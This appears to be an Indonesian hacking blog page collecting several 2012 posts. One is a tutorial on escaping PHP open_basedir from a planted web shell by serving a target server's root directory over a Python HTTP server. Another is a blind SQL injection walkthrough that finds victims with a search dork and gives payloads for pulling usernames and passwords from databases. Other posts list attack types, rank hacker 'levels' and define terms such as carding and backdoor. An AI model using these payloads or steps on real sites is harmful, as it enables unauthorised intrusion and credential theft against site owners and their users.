A Little Piece of n00b

Trik jumping di server yg pake open_basedir (trik pake python)

<div class="separator" style="clear: both; text-align: center;"><a href="http://i40.tinypic.com/ix5hck.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div> 
kali ini ane mau membagi sedikit trik cupu untuk membypass server yg di set open_basedir nya, mungkin dah bnyk yg tau, hehehe, mungkin juga blum pada tau :-p 
 
open_basedir itu sendiri adalah settingan pada php.ini yg bisa membatasi akses php pada folder tertentu, misalkan ane set seperti ini pada php.ini 
 
 
<blockquote class="tr_bq"><div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>open_basedir = /var/www/dono</code></div></div></blockquote> 
maka kita tidak akan bisa membuka semua dir selain /var/www/dono dan semua file dan folder didalamnya... 
jadi kita gak bisa buka misalnya tetangganya /var/www/kasino atau /var/www/indro ataupun /etc dll 
 
baca lebih jelas tentang open_basedir disini 
<a href="http://id.php.net/manual/en/ini.core.php#ini.open-basedir" target="_blank">http://id.php.net/manual/en/ini.core.php...en-basedir</a> 
 
misal kita udah ada shell di /var/www/dono/b374k.php 
nah truz kita buka tuh shell, 
ternyata kita gak bisa ke folder2 lain karena di batasi menggunakan open_basedir nya php 
<div class="separator" style="clear: both; text-align: center;"><a href="http://i44.tinypic.com/fk1eyo.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="181" src="http://i44.tinypic.com/fk1eyo.jpg" width="320" /></a></div> 
nah klo ketemu yg kek gini ada berbagai macam solusinya 
kali ini mari kita bypass menggunakan python, 
jadi python harus bisa diakses dari shell punya kita, coba cek pake  
 
<blockquote class="tr_bq"><div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>python -h</code></div></div></blockquote>klo keluar help nya itu berarti bisa kita lanjut coba, 
klo python gak bisa diakses langkah selanjutnya gak akan bisa, nanti ane buatkan thread lainnya untuk bypass yg kyk gini klo python gak bisa 
save script python berikut ini dengan nama misalnya webs.py 
 
<blockquote class="tr_bq"><div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>#!/usr/bin/env python 
# devilzc0de.org (c) 2012 
import SimpleHTTPServer 
import SocketServer 
import os 
 
port = 13123 
 
if __name__=='__main__': 
    os.chdir('/') 
    Handler = SimpleHTTPServer.SimpleHTTPRequestHandler 
 
    httpd = SocketServer.TCPServer(("", port), Handler) 
 
    print("Now open this server on webbrowser at port : " + str(port)) 
    print("example: http://maho.com:" + str(port)) 
    httpd.serve_forever()</code></div></div></blockquote><a href="http://pastebin.com/vPFCVu7h" target="_blank">http://pastebin.com/vPFCVu7h</a> 
<div class="separator" style="clear: both; text-align: center;"><a href="http://i40.tinypic.com/205cjg3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="http://i40.tinypic.com/205cjg3.jpg" width="320" /></a></div> script tersebut diatas akan pindah ke root directory, lalu menjalankan <a href="http://docs.python.org/library/simplehttpserver.html" target="_blank">SimpleHTTPServer</a> yg listen pada port 13123 
 
jalankan script python kita dengan perintah 
 
<blockquote class="tr_bq"><div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>python webs.py</code></div></div></blockquote><div class="separator" style="clear: both; text-align: center;"><a href="http://i39.tinypic.com/2je1wqq.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="182" src="http://i39.tinypic.com/2je1wqq.jpg" width="320" /></a></div>klo udah , biarin aja tabs nya loading gitu, 
sekarang buka websitenya di port 13123 
misalkan target nya <a href="http://jablay.com/" target="_blank">http://jablay.com/</a> 
maka buka di <a href="http://jablay.com:13123/" target="_blank">http://jablay.com:13123</a> 
<div class="separator" style="clear: both; text-align: center;"><a href="http://i44.tinypic.com/j5ifwm.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="259" src="http://i44.tinypic.com/j5ifwm.jpg" width="320" /></a></div>oke selamat bereksplorasi <img alt="ketawa" border="0" src="http://devilzc0de.org/forum/images/smilies/ketawa.gif" style="vertical-align: middle;" title="ketawa" /> 
<div class="separator" style="clear: both; text-align: center;"><a href="http://i40.tinypic.com/ix5hck.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="258" src="http://i40.tinypic.com/ix5hck.jpg" width="320" /></a></div>sekian tutor cupu ini <img alt="tersipu" border="0" src="http://devilzc0de.org/forum/images/smilies/tersipu.gif" style="vertical-align: middle;" title="tersipu" />

Trik jumping di server yg pake open_basedir (trik pake python)

kali ini ane mau membagi sedikit trik cupu untuk membypass server yg di set open_basedir nya, mungkin dah bnyk yg tau, hehehe, mungkin juga blum pada tau :-p open_basedir itu sendiri adalah setting…

27 May 2012

[Tehnik] Beberapa Teknik Hacking :p

wokeh langsung aja ya buat kalian semua yang baca ini perhatikan baikÃ‚Â² orang paling 
ganteng sejagat raya indonesia ingin memberikan tulisan yang kalo dalam basaha sekarang nya / bahasa gaol nya itu tuuu... 
sharing ....... <img alt="" border="0" class="inlineimg" src="http://www.indonesianhacker.or.id/images/smilies/4.gif" title="tersenyum lebar" /> <img alt="" border="0" class="inlineimg" src="http://www.indonesianhacker.or.id/images/smilies/hang.gif" title="hang" /> 
 
di tulisan ini si kalo ga salah ya membahas tentang serangan2 ato ancaman dari hacker gitu deh 
 
ok kita mulai <img alt="" border="0" class="inlineimg" src="http://www.indonesianhacker.or.id/images/smilies/4.gif" title="tersenyum lebar" /> 
 
1.SERANGAN PADA PASSWORD 
perlu diketahui bahwa jika kita login pa aja kta,harus menggunakan kunci atau password.maka kalau kunci yg kita buat tidak unik atau mudah dbuat,kunci it akan mudah dibo2l dan dtebak ataupun menggunakan metode BRUTE FORCE ATTACK,brutf force attack sesuai 
 
dgn namanya menebak password dgn brutal.yaitu memakai b’bgai kmbinasi kemungkinan. 
 
2.SOCIAL ENGINEERING 
metode ini sebagai menyusup dengan sistem memanfaatkan faktor psikologis korban.contoh metode SOCIAL ENGINEERING,sering anda lhat dalam khdpan shari2 kalau ada sms atau telpon yg mengarah kepada hanphone kita dan sms atau telpon itu mengatakan bahwa kita mendapatkan hadiah tertentu.dan untk it anda harus mngeluarkan biaya yg sngat bsar yg bersifat confidential?jika anda mengalaminy,perlu dwaspdai krenas seorng sosial engineer sdang mencri mangsa. 
 
3.MAN IN THE MIDDLE 
misalnya seseorng sdang asyik berkomunikasi bertukar informasi melalui sebuah jalur.tidak disangka tiba2 seorang hacker mencegat pesan it lalu dibaca,memodifikasi dan mengirimkan kembali pesan yg sudah beruah tersebut kepda korban.serangan ini disebut man in the middle. 
 
4.SNIFFING 
hampir mirip dengan metode MAN IN THE MIDDLE,tapi bedanya hanya mengambil dan menganalisanya tida dimodifkasi. 
 
5.WEB DEFACEMENT 
yah,ini merupakan serangan yg umumnya tidak berbahaya.tetapi tetap dgolngkan sbgai perusak,cntoh:jika web defacement berhasil menyerang atau membobol website yg memiliki keamanan tinggi,tentunya akan mengurangi kepercyan pelanggan. 
inilah posting kali ini yg saya berikan khusus untuk anda yg membuka blog saya.karena blog yg saya posting ini seharurnya sangat rhasia dkalangan hacker,tetapi saya akan membagi ilmu saya bagi yg setiap x membaca blog ini.pada posting laen x saya akan membahas tetang langkah2 hacking seperti yg dilakukan hacker pada umumnya,moga ilmu ini bermanfaat bagi anda semua,terima kasih.asslamualaiku wr.wb..

[Tehnik] Beberapa Teknik Hacking :p

wokeh langsung aja ya buat kalian semua yang baca ini perhatikan baikÃ‚Â² orang paling ganteng sejagat raya indonesia ingin memberikan tulisan yang kalo dalam basaha sekarang nya / bahasa gaol nya itu…

21 May 2012

Tutorial Blind SQL Injection Referensi Indonesia

================================================== ======= 
Tutorial Blind SQL Injection Referensi Indonesia 
================================================== ======= 
[+]Author : jos_ali_joe 
[+]Contact : josalijoe[at]yahoo[dot]com 
[+]Home : <a href="http://josalijoe.wordpress.com/" target="_blank">http://josalijoe.wordpress.com/</a> & <a href="http://indonesiancoder.com/" target="_blank">http://indonesiancoder.com/</a> 
 
Pendahuluan 
 
Maaf sebelum nya disini saya hanya memberikan apa yang memang saya pelajari tentang Blind SQL Injectiuon 
kalau mungkin dalam penjelasan ini kurang di mengeti mohon di maklumi hanya tutor cupu dari saya 
dan buat yang sudah master tentang Blind SQL kalau dari penjelasan saya ada kesalahan mohon di luruskan 
 
[~] Apa Itu Blind SQL Injection 
 
Mari di sini kita membahas Blind SQL tanpa metode SQL Injection 
Mungkin sudah banyak yang tahu tentang metode SQL Inject. Oke Lanjut <img alt="" border="0" class="inlineimg" src="http://www.indonesianhacker.or.id/images/smilies/4.gif" title="tersenyum lebar" /> 
Blind SQL Ini adalah metode hacking yang memungkinkan seorang Attacker yang tidak sah untuk mengakses server database. 
Hal ini difasilitasi oleh sebuah kesalahan pengkodean umum: program menerima data dari klien dan mengeksekusi query SQL tanpa terlebih dahulu memvalidasi masukan klien. 
Attacker kemudian bebas untuk mengekstrak, memodifikasi, menambah, atau menghapus konten dari database 
Attacker bahkan bisa menembus server database dan ke dalam operasi dasar system web yang di eksekusi. 
Attacker biasanya akan mengetes kerentanan SQL injection dengan mengirimkan masukan aplikasi yang akan menyebabkan server untuk menghasilkan sebuah query SQL yang tidak valid. 
Jika server kemudian kembali mengirimkan pesan karena kesalahan ke klien, Si Attacker akan mencoba untuk reverse-engineer bagian dari query SQL yang asli menggunakan informasi yang diperoleh dari pesan kesalahan tersebut. 
Ciri khas dari administratif safeguard hanya untuk melarang menampilkan pesan kesalahan database server. 
Sayangnya itu tidak cukup.Jika aplikasi anda tidak ada pesan error, mungkin masih rentan terhadap serangan SQL 
Maaf bahasa nya terlalu kurang di mengerti. 
 
[~] Mendeteksi Blind SQL Injection 
 
Aplikasi Web biasanya menggunakan query SQL dengan masukan klien yang disertakan dalam klausa WHEREUntuk mengambil data dari database. 
Dengan menambahkan kondisi tambahan untuk pernyataan SQL dan mengevaluasi output aplikasi web, Anda dapat menentukan apakah atau tidak aplikasi yang rentan terhadap SQL injection. 
 
[~] Blind SQL Injection 
 
Oke mari lanjut ke contoh Eksekusi Blind SQL Injection setelah di atas sudah menjelaskan tentang apa itu Blind SQL Injection dan Mendeteksi nya. 
Yupz Lanjut Kang Disini saya menggunakan Contoh Eksekusi dengan dork [ inurl:news.php?id= ] 
Contoh : <a href="http://www.site.com/news.php?id=2" target="_blank">http://www.site.com/news.php?id=2</a> 
Yuk Bareng Kita Inject : 
<a href="http://www.site.com/news.php?id=2" target="_blank">http://www.site.com/news.php?id=2</a> dan 1 = 1 <â€” ini selalu benar dan load halaman dari web itu sendiri masih normal 
<a href="http://www.site.com/news.php?id=2" target="_blank">http://www.site.com/news.php?id=2</a> dan 1 = 2 <â€” ini salah, jika masih ada beberapa teks, gambar atau beberapa konten yang hilang pada halaman kdari web kembali maka web tersebut rentan terhadap serangan Blind SQL Injection 
 
[~] Mendapatkan Versi My SQL 
 
Untuk mendapatkan versi MySQL dalam serangan blind harus menggunakan substring: 
<a href="http://www.site.com/news.php?id=2" target="_blank">http://www.site.com/news.php?id=2</a> and substring(@@version,1,1)=4 
Hal ini harus mengembalikan TRUE jika versi MySQL 4. Ganti 4 dengan 5, dan jika kembali query TRUE maka versi adalah 5. 
 
[~] Memeriksa SubSelect 
 
Ketika Kita menginject dan tidak bekerja maka kita gunakan subselect. 
<a href="http://www.site.com/news.php?id=2" target="_blank">http://www.site.com/news.php?id=2</a> and (select 1)=1 
Jika halaman web tersebut berubah normal kemudian subselect bekerja, maka kita akan melihat apakah kita memiliki akses ke mysql.user: 
<a href="http://www.site.com/news.php?id=2" target="_blank">http://www.site.com/news.php?id=2</a> and (select 1 from mysql.user limit 0,1)=1 
Jika load halaman web biasanya kita memiliki akses ke mysql.user dan kemudian kita bisa menarik beberapa load_file password menggunakan () fungsi dan outfile. 
 
[~] Memeriksa Tabel dan Nama Kolom 
 
Ini tingkat susah enak nya Blind SQL itu sendiri di sini keberuntungan dan menebak-nebak bekerja lebih dari apa pun. 
<a href="http://www.site.com/news.php?id=2" target="_blank">http://www.site.com/news.php?id=2</a> and (select 1 from users limit 0,1)=1 
(Dengan limit 0,1 query kita disini mengembalikan 1 baris data, menyebabkan kembali subselect hanya 1 baris, ini sangat penting) 
Jika Anda mendapatkan FALSE (beberapa artikel yang hilang), hanya mengubah nama tabel sampai anda menebak yang benar. 
Nah seumpama di sini kita sudah mendapatkan nama tabel pengguna, sekarang apa yang kita butuhkan adalah kolom nama. 
Sama dengan nama tabel, kita mulai menebak. Seperti saya bilang sebelumnya coba nama umum untuk kolom: 
<a href="http://www.site.com/news.php?id=2" target="_blank">http://www.site.com/news.php?id=2</a> and (select substring(concat(1,password),1,1) from users limit 0,1)=1 
Jika halaman web yang kita inject biasanya kita tahu bahwa nama kolom adalah password (jika kita mendapatkan 
yang false kemudian coba nama umum atau hanya menebak). 
Di sini kita menggabungkan 1 dengan password kolom, kemudian substring kembali karakter pertama (1,1) 
 
[~] Mendapatkan Full Data Dari Web Yang Kita Inject 
 
Kita telah menemukan tabel kolom username i password sehingga kami akan tarik karakter tersebut. 
<a href="http://www.site.com/news.php?id=2" target="_blank">http://www.site.com/news.php?id=2</a> and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80 
Ok di sini mari kita menarik karakter pertama dari pengguna pertama di tabel pengguna. 
Substring di sini mengembalikan karakter pertama dan 1 karakter panjangnya. ascii () mengkonversi bahwa 1 karakter ke nilai ascii dan kemudian membandingkannya dengan simbol yang lebih besar kemudian>. 
Jadi jika ascii char lebih besar dari 80, beban halaman normal. (TRUE) kita terus mencoba sampai kita mendapatkan false. 
<a href="http://www.site.com/news.php?id=2" target="_blank">http://www.site.com/news.php?id=2</a> and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95 
Disini saya mendapatka True mari kita naikan true nya 
<a href="http://www.site.com/news.php?id=2" target="_blank">http://www.site.com/news.php?id=2</a> and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98 
Belum dapat juga true nya mari kita tambahkan lagi 
<a href="http://www.site.com/news.php?id=2" target="_blank">http://www.site.com/news.php?id=2</a> and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99 
Yupz Ternyata False ada di 99 .. <img alt="" border="0" class="inlineimg" src="http://www.indonesianhacker.or.id/images/smilies/10.gif" title="menjulurkan lidah" /> 
Jadi karakter pertama di username adalah char (99). karena (99) adalah huruf â€˜câ€™ . Coba convert aja di ascii <img alt="" border="0" class="inlineimg" src="http://www.indonesianhacker.or.id/images/smilies/10.gif" title="menjulurkan lidah" /> 
Jadi teruslah Tambahkan sampai kita mendapatkan nya . (Ketika> 0 returns false kita tahu bahwa kita telah mencapai akhir) 
 
[~] Beberapa Pertanyaan 
 
Tanya : Untuk mengetahui char nya dari mana ?? 
Jawab : <a href="http://ascii-table.com/" target="_blank">http://ascii-table.com/</a> 
 
Tanya : blind sql injection cisa buat inject smua site?? 
Jawab : bisa buat injek semua site yang memiliki bug sql. klo mau sih yg v5 pun bisa pakai blind injek. tp v5 kan ada table information_schema. jd di manfaatin. 
 
Tanya : Trus buat ngecek bug cuma make â€˜,and 1=1,and 1=0?? ad yg laen?? 
Jawab : bisa juga pakai tanda minus di belakangnya ( ?id=1- ) 
 
Tanya : maksudnya true am false apa? kalau true halaman web tetep? klo false halaman web burbah ? 
Jawab : true = return benar sesuai kondisi yg di tentukan. 
false = return salah berdasar kondisi yg di tentukan. 
misal : and 1=1 
=> true jika berita muncul. karena 1=1 adalah benar, jd muncul. 
=> false jika berita tidak muncul 
 
and 1=2 
=> true jika berita tidak muncul. karena 1=2 adalah salah, jd gak muncul. 
=> false jika berita ternyata muncul 
 
Tanya : blind sql injection bisa nginjek .htm? ato cuma yg php ujungnya? 
Jawab : .htm, .php, .asp, dll. itu tergantung config server. ada server yang di config kalau file berextensi .htm adalah php itu bisa saja. 
tapi normalnya, adalah .php. karena php yg mengelola data di server. tetepi sprt yg gw katakan barusan, gak semua yg .php, tp .htm pun bisa berisi php, sesuai config. 
 
[~] Penutup 
 
Terima kasih sudah membaca tutor cupu dari saya . mohon untuk jangan Tertawa jika ada yang salah . 
 
Referensi : Google â€“ Packetstorm Security â€“ Wikipedia â€“ Hacker Newbie 
 
Grettz : ./Devilzc0de crew â€“ Kebumen Cyber â€“ Explore Crew â€“ Indonesian Hacker â€“ Tecon Crew â€“ Palembang Hacker Link â€“ Codenesia 
 
./Byroe Net â€“ Yogya Carderlink â€“ Wannabe Hacker â€“ anten4 â€“ Hacker Newbie â€“ Packetstorm Security â€“ All Forum Underground Indonesia 
 
My Team : ./Indonesian Coder 
 
Special Thanks :./ Allah S.w.t & Muhammad S.a.w 
./ Terima kasih buat guru Blind Sql : ./ArRay â€“ game over â€“ gt_portnoy

Tutorial Blind SQL Injection Referensi Indonesia

================================================== ======= Tutorial Blind SQL Injection Referensi Indonesia ================================================== ======= [+]Author : jos_ali_joe [+]…

21 May 2012

Wordlists

Wordlists

http://www.filecrop.com/wordlist.lst.html…

16 May 2012

== TINGKATAN MASYARAKAT HACKER ==

Pada dasarnya, setiap pelaku TI atau praktisi hacking itu sendiri mendefenisikan konsep 'HACKING' yang berbeda. Tidak tertutup kemungkinan untuk terjadi perbedaan pendapat terhadap konsep yang di makhsud, namun cukup jadikan perbedaan pendapat sebagai sebuah kekayaan pemikiran. Dalam perjalanan menuju pendewasaan, <span class="IL_AD" id="IL_AD8" style="-webkit-box-shadow: none !important; background-attachment: scroll !important; background-clip: initial !important; background-color: white; background-image: none !important; background-origin: initial !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(0, 153, 0) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: rgb(0, 153, 0) !important; cursor: pointer !important; display: inline !important; float: none !important; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; padding-bottom: 1px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static;">perubahan pola pikir dan kemampuan teknik, setiap manusia yang memasuki wilayah hacking akan melewati beberapa tingkatan. <span data-iceapc="1" data-iceapw="3" style="-webkit-box-shadow: none !important; background-color: white; color: #333333; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: small;">1. Si Dungu Saya rasa tidak berlebihan untuk menyebut masyarakat pada tingkatan ini dengan istilah dungu. Mereka hanya memiliki kemampuan teknis komputer yang rendah dan mengenal hacking dari surat kabar, bahwa hacker adalah seorang penjahat elektronik. Bahkan beberapa diantara mereka juga menulis di surat kabar dalam hal dan konsep yang sama. <span data-iceapc="1" data-iceapw="2" style="-webkit-box-shadow: none !important; background-color: white; color: #333333; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: small;">2. Lamer Lamer merupakan sebuah fenomenal awal remaja yang tertarik mempelajari hacking. Mereka mempunyai kemampuan komputer standar dan sedikit lebih banyak mendapat informasi. Mereka mencoba mencari petunjuk serangan praktis. Baik dari e-zine maupun melalui diskusi IRC (<span class="IL_AD" id="IL_AD6" style="-webkit-box-shadow: none !important; background-attachment: scroll !important; background-clip: initial !important; background-color: white; background-image: none !important; background-origin: initial !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(0, 153, 0) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: rgb(0, 153, 0) !important; cursor: pointer !important; display: inline !important; float: none !important; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; padding-bottom: 1px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static;">Chatting). Serangan dilakukan dengan trojan, sebuah remote <span class="IL_AD" id="IL_AD7" style="-webkit-box-shadow: none !important; background-attachment: scroll !important; background-clip: initial !important; background-color: white; background-image: none !important; background-origin: initial !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(0, 153, 0) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: rgb(0, 153, 0) !important; cursor: pointer !important; display: inline !important; float: none !important; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; padding-bottom: 1px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static;">administration tool yang memberikan akses terhadap mesin yang telah terinfeksi.  Lamer juga melakukan benyak hal-hal tidak berguna, seperti tukar-menukar <span class="IL_AD" id="IL_AD10" style="-webkit-box-shadow: none !important; background-attachment: scroll !important; background-clip: initial !important; background-color: white; background-image: none !important; background-origin: initial !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(0, 153, 0) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: rgb(0, 153, 0) !important; cursor: pointer !important; display: inline !important; float: none !important; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; padding-bottom: 1px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static;">nomor kartu kredit, dan tukar-menukar password <span class="IL_AD" id="IL_AD9" style="-webkit-box-shadow: none !important; background-attachment: scroll !important; background-clip: initial !important; background-color: white; background-image: none !important; background-origin: initial !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(0, 153, 0) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: rgb(0, 153, 0) !important; cursor: pointer !important; display: inline !important; float: none !important; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; padding-bottom: 1px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static;">website porno komersial. Hacker yang kompeten, atau remaja yang berhasil lolos dari 'seleksi alam' akan melalui masa ini dengan begitu cepat memasuki wilayah penuh keingintahuan. <span data-iceapc="1" data-iceapw="2" style="-webkit-box-shadow: none !important; background-color: white; color: #333333; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: small;">3. Wannabe Wannabe hacker menganggap hacking lebih sebagai philosophy, atau seni kehidupan. Mereka mulai membaca teknik-teknik hacking dasar dan melakukan searching (pencarian) dokumen-dokumen hack yang lebih serius. Wannabe telah menunjukkan antusiasnya dalam hacking dan mulai meninggalkan dunia lamer yang penuh kebodohan. <span data-iceapc="1" data-iceapw="2" style="-webkit-box-shadow: none !important; background-color: white; color: #333333; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: small;">4. Larva Perjalanan penuh perjuangan menjadi kupu-kupu. Larva telah disibukkan dengan berbagai pertanyaan bagaimana benda-benda bekerja ? Bagaimana dunia bekerja. Larva adalah <span class="IL_AD" id="IL_AD12" style="-webkit-box-shadow: none !important; background-attachment: scroll !important; background-clip: initial !important; background-color: white; background-image: none !important; background-origin: initial !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(0, 153, 0) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: rgb(0, 153, 0) !important; cursor: pointer !important; display: inline !important; float: none !important; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; padding-bottom: 1px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static;">step terpenting dalam pembentukan jati diri hacker. Mereka menemukan cara untuk membuat eksploits sendiri. Mencoba melakukan penetrasi sistem tanpa melakukan pengerusakan, karena mereka tahu, pengerusakan sistem adalah cara termudah bagi mereka (sysadmin dan polisi) untuk menangkap jejak sang larva. <span data-iceapc="1" data-iceapw="2" style="-webkit-box-shadow: none !important; background-color: white; color: #333333; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: small;">5. Hacker Sebuah keindahan, naluri, karunia tuhan terhadap orang-orang yang berjuang. Akhirnya tingkatan tertinggi dari budaya digital telah dicapai. Sebuah dunia baru menanti. Dunia hacking !! Sesunguhnya setiap orang tidak akan tau kapan pastinya ia menjadi hacker. Sama halnya dengan anda tidak pernah tau pasti kapan anda tertidur.  Hal terpenting adalah terus belajar dan mengembangkan <span class="IL_AD" id="IL_AD3" style="-webkit-box-shadow: none !important; background-attachment: scroll !important; background-clip: initial !important; background-color: white; background-image: none !important; background-origin: initial !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(0, 153, 0) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: rgb(0, 153, 0) !important; cursor: pointer !important; display: inline !important; float: none !important; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; padding-bottom: 1px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static;">pengetahuan. Saat anda beristirahat sejenak dan mengenang kembali anda telah menjadi hacker. <span data-iceapc="1" data-iceapw="1" style="-webkit-box-shadow: none !important; background-color: white; color: #333333; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: medium;">Kemampuan <span class="IL_AD" id="IL_AD1" style="-webkit-box-shadow: none !important; background-attachment: scroll !important; background-clip: initial !important; background-color: transparent !important; background-image: none !important; background-origin: initial !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(0, 153, 0) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: rgb(0, 153, 0) !important; cursor: pointer !important; display: inline !important; float: none !important; font-size: 18px !important; padding-bottom: 1px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static;">Spesial Hacker dalam tahap pendewasaannya akan mengalami spesialisasi skil/kemampuan. Mereka akan dikenal sebagai: <span data-iceapc="1" data-iceapw="2" style="-webkit-box-shadow: none !important; background-color: white; color: #333333; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: small;">1. Wizard Yaitu seseorang yang memiliki pengetahuan yang begitu banyak terhadap subyek tertentu. <span data-iceapc="1" data-iceapw="2" style="-webkit-box-shadow: none !important; background-color: white; color: #333333; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: small;">2. Guru Seseorang yang tau apapun tehadap subyek tertentu. Mereka mengetahui fitur-fitur tak terdokumentasi. Trik-trik pengembangan, dan teknik-teknik mengalahkan keterbatasan. Hacker sejati mengenal kebodohannya dan terus mengembangkan diri untuk mengatasi semua kebodohannya. Dan dalam perjalanan itu alam mengadakan seleksi, siapakah yang mampu bertahan ? Reverensi: <a href="http://www.elfqrin.com/docs/HackerStages.html" style="-webkit-box-shadow: none !important; background-color: white; color: #bf3425; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-decoration: none;" target="_blank">http://www.ElfQrin.com/docs/HackerStages.html</a>

== TINGKATAN MASYARAKAT HACKER ==

Pada dasarnya, setiap pelaku TI atau praktisi hacking itu sendiri mendefenisikan konsep 'HACKING' yang berbeda. Tidak tertutup kemungkinan untuk terjadi perbedaan pendapatterhadap konsep yang di makhs…

15 May 2012

Index Istilah Umum Hacking

Backdoor : <span class="IL_AD" id="IL_AD4" style="-webkit-box-shadow: none !important; background-attachment: scroll !important; background-clip: initial !important; background-color: white; background-image: none !important; background-origin: initial !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(0, 153, 0) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: rgb(0, 153, 0) !important; cursor: pointer !important; display: inline !important; float: none !important; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; padding-bottom: 1px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static;">File PHP yang diupload ke <span class="IL_AD" id="IL_AD2" style="-webkit-box-shadow: none !important; background-attachment: scroll !important; background-clip: initial !important; background-color: white; background-image: none !important; background-origin: initial !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(0, 153, 0) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: rgb(0, 153, 0) !important; cursor: pointer !important; display: inline !important; float: none !important; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; padding-bottom: 1px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static;">situs untuk meremote situs tersebut. Carder : <span class="IL_AD" id="IL_AD1" style="-webkit-box-shadow: none !important; background-attachment: scroll !important; background-clip: initial !important; background-color: white; background-image: none !important; background-origin: initial !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(0, 153, 0) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: rgb(0, 153, 0) !important; cursor: pointer !important; display: inline !important; float: none !important; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; padding-bottom: 1px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static;">Individu yang melakukan Carding. Carding : Kegiatan yang berhubungan dengan Credit Card/Kartu Kredit. Deface : Aksi merubah file sebuah situs, lebih umum ke index. Defacer : Individu yang melakukan aksi deface. Dork : Kata kunci untuk searching di <span class="IL_AD" id="IL_AD5" style="-webkit-box-shadow: none !important; background-attachment: scroll !important; background-clip: initial !important; background-color: white; background-image: none !important; background-origin: initial !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(0, 153, 0) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: rgb(0, 153, 0) !important; cursor: pointer !important; display: inline !important; float: none !important; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; padding-bottom: 1px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static;">search engine (Google, Astalavista, Bing, dll). Hack : tidak terdefinisikan; kegiatan yang berbau komputer. Hacker : Individu yang melakukan kegiatan hacking. Hacking : kegiatan hack. <span class="IL_AD" id="IL_AD3" style="-webkit-box-shadow: none !important; background-attachment: scroll !important; background-clip: initial !important; 